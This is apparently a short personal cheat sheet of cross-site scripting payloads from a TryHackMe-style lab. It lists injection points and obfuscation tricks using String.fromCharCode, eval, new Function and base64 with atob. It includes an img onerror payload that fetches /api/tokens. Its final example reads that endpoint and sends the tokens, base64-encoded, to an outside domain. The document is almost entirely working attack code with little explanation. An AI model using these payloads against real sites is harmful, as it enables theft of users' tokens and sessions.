Cross-site scripting (XSS)
injection point 1
injection point 2
injection point 3
injection point 4
injection point 5
<script>
document.getElementsByClassName('name')[0].innerHTML='michal'; alert('THM'); //';
</script>
injection point 6
injection point 7
Example 1
String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41) => "alert('XSS')" (string)
eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41)) => alert('XSS') (function)
{test:eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))}
new Function('alert(1)')()
new Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()
{test:new Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()}
Example 2
xhttp = new XMLHttpRequest();
xhttp.onload = function(){alert(this.responseText)}; xhttp.open('GET','/api/tokens');
xhttp.send();
eval(atob(".................."));
eval(atob('..................'));
eval(atob(`..................`));
<img src=0 onerror='eval(atob(`eGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgCnhodHRwLm9ubG9hZCA9IGZ1bmN0aW9uKCl7YWxlcnQodGhpcy5yZXNwb25zZVRleHQpfTsgeGh0dHAub3BlbignR0VUJywnL2FwaS90b2tlbnMnKTsgIAp4aHR0cC5zZW5kKCk7`))'/>
Example 3
a = new XMLHttpRequest();
a.onload = function(){
b = new XMLHttpRequest();
b.open('GET','//michalszalkowski.com?'+btoa(this.responseText));
b.send();
};
a.open('GET','/api/tokens');
a.setRequestHeader('Hacker', 'Szalek');
a.send();